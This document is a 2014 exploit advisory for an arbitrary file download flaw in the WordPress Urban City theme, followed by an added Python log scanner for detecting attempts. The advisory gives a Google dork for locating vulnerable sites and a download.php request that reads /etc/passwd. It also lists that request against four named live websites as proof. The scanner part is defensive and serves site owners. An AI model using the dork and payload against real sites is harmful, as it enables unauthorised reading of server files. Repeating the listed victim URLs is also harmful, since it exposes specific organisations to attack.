WordPress Urban City theme suffers from an arbitrary file download vulnerability. Note that this finding houses site-specific data.
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: WordPress Urban City Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/urbancity
|
|[*] Date : 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : https://churchthemes.net/themes/urban-city/
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.nlbcministries.org/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
www.colonialhills.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://iccpaix.org/wpblog/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://praisecovenant.net/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
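
An added example, not part of the original advisory: a log check a site owner can run to find requests to the script named under "Location" whose `file` parameter points outside the expected download area. The combined log format, the `wp-content/uploads/` allow-list, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path from the advisory's "Location" line; suffix match covers subdirectory installs.
SCRIPT = "/wp-content/themes/urbancity/lib/scripts/download.php"
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3}) ')  # assumed "combined" format
# Assumption: legitimate downloads are media files under wp-content/uploads/.
ALLOWED_PREFIX, ALLOWED_EXT = "wp-content/uploads/", (".mp3", ".pdf", ".jpg", ".png")
# Constructed sample lines (documentation addresses), not real traffic.
LOG_FMT = '{} - - [07/Sep/2014:10:00:00 +0000] "GET {}?file={} HTTP/1.1" {} 512 "-" "-"'
SAMPLE = [
    LOG_FMT.format("198.51.100.4", SCRIPT, "wp-content/uploads/2014/09/sermon.mp3", 200),
    LOG_FMT.format("203.0.113.7", SCRIPT, "/etc/passwd", 200),
    LOG_FMT.format("203.0.113.7", "/wpblog" + SCRIPT, "..%252f..%252fetc%252fpasswd", 200),
    LOG_FMT.format("203.0.113.9", SCRIPT, "readme.txt", 404),
]


def decode_fully(value, rounds=3):
    """Undo nested percent-encoding such as %252f, up to a fixed depth."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def classify(file_param):
    """Return why a file= value is suspicious, or None if it looks legitimate."""
    path = decode_fully(file_param).replace("\\", "/")
    checks = [
        ("absolute path", path.startswith("/") or re.match(r"[A-Za-z]:/", path)),
        ("directory traversal", ".." in path.split("/")),
        ("outside expected area", not (path.startswith(ALLOWED_PREFIX)
                                       and path.lower().endswith(ALLOWED_EXT))),
    ]
    return next((reason for reason, hit in checks if hit), None)


def scan(lines):
    """Return (ip, status, file, reason) for suspicious requests to the script."""
    hits = []
    for m in filter(None, map(LINE_RE.match, lines)):
        ip, target, status = m.groups()
        url = urlsplit(target)
        if decode_fully(url.path).lower().endswith(SCRIPT):
            for value in parse_qs(url.query).get("file", []):
                reason = classify(value)
                if reason:
                    hits.append((ip, int(status), decode_fully(value), reason))
    return hits
```

A hit with status 200 means the file was served and anything readable by the web server user at that path should be treated as disclosed; a 404 on the script itself indicates probing of a site that does not have the theme installed.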